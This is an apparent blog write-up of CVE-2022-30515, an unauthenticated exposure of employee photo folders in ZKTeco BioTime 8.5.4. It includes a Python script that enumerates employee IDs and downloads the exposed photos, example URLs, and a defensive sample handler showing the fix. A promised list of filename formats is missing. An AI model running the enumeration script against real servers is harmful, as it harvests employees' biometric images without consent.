In today’s world, employee privacy is not just a company matter—it's the law in many places. Any leak of personal data, like employee photos, can have social, legal, and financial impacts. This long read will walk you through CVE-2022-30515, a security vulnerability found in ZKTeco’s BioTime 8.5.4 time and attendance solution.

With this vulnerability, attackers can sneak into employee image folders without even being logged in. We'll break down what the issue is, show you code snippets, describe how attacks work, and provide the original research links—all in simple, direct language.

What is ZKTeco BioTime?

ZKTeco BioTime is a web-based software system for managing employee attendance based on biometrics like fingerprints or faces. Businesses often use it to track when employees check in and out. If your company has fingerprint or face scanners at the entrance—it could well be running ZKTeco.

Employee data, including their photos for biometric identification, are stored on the server running BioTime.

What is CVE-2022-30515?

CVE-2022-30515 is a security flaw in ZKTeco BioTime 8.5.4, where the application saves employee images in directories that everyone can access without login or authentication. That means someone who simply visits the right web address can see employee photos directly, with no username or password required.

- Risk: Exposure of private employee photographs.

- Attack prerequisite: An attacker only needs network access to the BioTime web server (for example, the same WiFi, a VPN, or a server exposed on the Internet).

The Problem: No Checks, No Privacy

BioTime 8.5.4 places uploaded employee photos inside one or more web folders. There is no check to see if a user is logged in before allowing access to files in these folders.

Photos might end up stored here on the server:

/biotime/media/employee_photos/

Or accessed via URLs like:

http://<biotime-server>/media/employee_photos/100023.jpg

There is no need to log in to visit that URL and see the image. You can just paste the web link in your browser, and—if you can guess or enumerate the file name—you will see the photo.

Find a Valid Image URL:

Employee images often follow predictable naming conventions, like employee or user IDs. Common formats are:

Enumerate Filenames:

Write a script to cycle through thousands of possible numbers in the filename, to see which ones exist.

Example: Python PoC Snippet

import requests

base_url = "http://<biotime-server>/media/employee_photos/"

# Walk a small block of candidate employee IDs, trying each common image extension.
# (The original range was reversed, 1000001..100010, which Python treats as empty.)
for emp_id in range(100001, 100010):
    for ext in ["jpg", "jpeg", "png"]:
        url = f"{base_url}{emp_id}.{ext}"
        response = requests.get(url, timeout=5)
        # An unauthenticated 200 means the photo is exposed; save it as evidence.
        if response.status_code == 200:
            print(f"Found image: {url}")
            with open(f"{emp_id}.{ext}", "wb") as f:
                f.write(response.content)

Replace <biotime-server> with your target IP/hostname.

This code tries different employee IDs with different file extensions and saves the images it finds.

Attacker visits the public folder in the browser:

http://192.168.1.100/media/employee_photos/

The employee photo is displayed directly in the browser.

[Image: example employee photo]

Why Is This Bad?

- Privacy Violation: Personal information, like employee faces, becomes public to anyone on the network.

Solution & Fix

ZKTeco fixed this issue in later releases. The folder now requires authentication—you have to be logged into BioTime to access photos.
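As an added illustration (not ZKTeco's code), here is the shape of the check the fix introduces: a photo handler that refuses any request without a login session and confines the requested file name to the photo directory, so neither a guessed URL nor a folder listing works anonymously. The cookie name "sessionid", the session ids and the directory path are assumptions for the demo.

```python
import os
import hmac

# Added example, not BioTime's code. Two checks a photo endpoint needs:
# a valid login session before any file is served, and a requested name
# that cannot escape the photo directory or name the directory itself.


def session_from_cookie(cookie_header, valid_sessions):
    """Return the session id named in the Cookie header if it is a known one."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name != "sessionid":          # assumed cookie name
            continue
        for sid in valid_sessions:
            # Constant-time compare so the check does not leak id prefixes.
            if hmac.compare_digest(value.encode(), sid.encode()):
                return sid
    return None


def confined_path(photo_root, requested):
    """Resolve <photo_root>/<requested>; None if it escapes or names the folder."""
    root = os.path.realpath(photo_root)
    candidate = os.path.realpath(os.path.join(root, requested))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def serve_photo(requested, cookie_header, photo_root, valid_sessions, load_photo):
    """Return (status, body) for GET /media/employee_photos/<requested>.

    load_photo(path) returns the file bytes, or None when the file is absent.
    """
    if session_from_cookie(cookie_header, valid_sessions) is None:
        return 401, b"login required"   # the check BioTime 8.5.4 did not make
    path = confined_path(photo_root, requested)
    if path is None:
        return 400, b"bad path"         # traversal attempt or directory listing
    data = load_photo(path)
    if data is None:
        return 404, b"not found"
    return 200, data


if __name__ == "__main__":
    # Constructed in-memory store standing in for the media directory on disk.
    root = "/biotime/media/employee_photos"
    photos = {root + "/100023.jpg": b"\xff\xd8 constructed jpeg bytes"}
    sessions = {"demo-session-1"}
    for cookie in ("", "sessionid=demo-session-1"):
        status, _ = serve_photo("100023.jpg", cookie, root, sessions, photos.get)
        print(repr(cookie), "->", status)   # '' -> 401, with session -> 200
```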

- NVD - CVE-2022-30515
- Packet Storm Security Advisory
- ZKTeco BioTime official site

Final Thoughts

CVE-2022-30515 is a textbook example of how web apps must not assume folders or files are "internal" just because of their name or location. If you run BioTime or any similar HR/attendance tool, don’t take privacy for granted—always keep your software up to date, and make sure sensitive resources are protected by strong checks.

If you want to check your own company's exposure, simply try accessing the /media/employee_photos/ folder on your BioTime server. If you see photos without logging in, you need to update—fast.

Stay safe, and always respect employee privacy.

*Written exclusively for your awareness. Sharing this knowledge is the first step to safer workplaces.*

Timeline

Published on: 11/08/2022 23:15:00 UTC
Last modified on: 11/09/2022 16:32:00 UTC